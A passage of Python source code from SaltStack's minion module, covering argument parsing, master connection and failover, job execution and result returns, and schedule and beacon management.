# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
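# Hedged usage sketch (config path is hypothetical):
#   opts = salt.config.minion_config('/etc/salt/minion')
#   sminion = SMinion(opts)
#   sminion.functions['test.ping']()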
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
connected_master = False
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
connected_master = True
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
# if we are out of masters, lets raise an exception
if not connected_master:
raise SaltClientError('Unable to connect to any master')
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules(initial_load=True)
else:
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf)
return []
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
self.io_loop.spawn_callback(self._connect_minion, s_opts)
@tornado.gen.coroutine
def _connect_minion(self, opts):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
try:
minion = Minion(opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(opts['master']),
)
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
# Fire off all the minion coroutines
self.minions = self._spawn_minions()
# serve forever!
self.io_loop.start()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.io_loop = io_loop or zmq.eventloop.ioloop.ZMQIOLoop()
if not self.io_loop.initialized():
self.io_loop.install()
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module
self.opts['grains'] = salt.loader.grains(opts)
# TODO: remove?
def sync_connect_master(self):
'''
Block until we are connected to a master
'''
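# Drive the asynchronous connect_master() coroutine to completion by starting
# the io_loop and stopping it from the future's done-callback; any connection
# error is re-raised below.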
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(lambda f: self.io_loop.stop())
self.io_loop.start()
if self._connect_master_future.exception():
raise self._connect_master_future.exception()
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
})
# add master_alive job if enabled
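# The '__master_alive' job periodically runs status.master so the minion can
# detect a lost master connection; handle_event() below reacts to the
# '__master_disconnected'/'__master_connected' events and keeps this job's
# kwargs in sync with the current connection state.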
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
})
self.grains_cache = self.opts['grains']
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
reinit_crypto()
continue
else:
reinit_crypto()
proxyminion = ProxyMinion(self.opts)
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minion's initialization
phase (for example from the minion's main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
elif isinstance(opts['master'], str):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minion's main event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts) # TODO: only run init once?? This will run once per attempt
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts,
timeout=timeout,
safe=safe,
io_loop=self.io_loop,
)
yield pub_channel.connect()
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minion\'s connection attempt.')
log.error(msg)
else:
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
opts.update(resolve_dns(opts))
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts,
timeout=timeout,
safe=safe,
io_loop=self.io_loop,
)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing errored: {0}. No beacons will be processed.'.format(traceback.format_exc(exc)))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data,
)
self.event_publisher.handle_publish([event])
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
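# RLIMIT_AS caps the process' total virtual address space; the limit is the
# current usage (rss + vms) plus the configured modules_max_memory headroom,
# and is restored to old_mem_limit once the modules have been loaded.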
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
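# Illustrative usage (values are hypothetical):
#   self._fire_master(data={'status': 'ok'}, tag='custom/heartbeat')
#   self._fire_master(events=[{'tag': 'beacon/foo', 'data': {...}}])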
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target,
args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
else:
self.win_proc.append(process)
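# On Windows the handles are kept in self.win_proc and joined/removed later by
# _fallback_cleanups(); on other platforms the job worker is joined here.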
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors = (
minion_instance._load_modules()
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
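# The proc file (<proc_dir>/<jid>) records the running job's data and PID; in
# the multiprocessing case it is removed again by _return_pub() once the job
# has returned.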
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
if opts.get('sudo_user', ''):
sudo_runas = opts.get('sudo_user')
if 'sudo.salt_call' in minion_instance.functions:
return_data = minion_instance.functions['sudo.salt_call'](
sudo_runas,
data['fun'],
*args,
**kwargs)
else:
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments: {0}\n{1}'.format(exc, func.__doc__)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
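# i.e. <cachedir>/minion_jobs/<jid>/return.p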
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
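# The scheduled 'event.fire' job emits a local 'grains_refresh' event; it is
# picked up by handle_event(), which refreshes pillar (and modules) if the
# grains have changed since the last refresh.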
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _ = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Manage the minion's scheduler: add, delete, modify, enable, disable, or run jobs based on an event.
'''
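# The unpacked event data is expected to look roughly like (illustrative):
#   {'func': 'add', 'schedule': {'job1': {'function': 'test.ping', 'seconds': 60}}}
# with 'name' and 'where' used by the job-level operations below.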
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
if func == 'delete':
self.schedule.delete_job(name)
elif func == 'add':
self.schedule.add_job(schedule)
elif func == 'modify':
self.schedule.modify_job(name, schedule, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, where)
elif func == 'run_job':
self.schedule.run_job(name, where)
elif func == 'disable_job':
self.schedule.disable_job(name, where)
elif func == 'reload':
self.schedule.reload(schedule)
def manage_beacons(self, package):
'''
Manage Beacons
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle SIGTERM cleanly; if it is signaled, exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
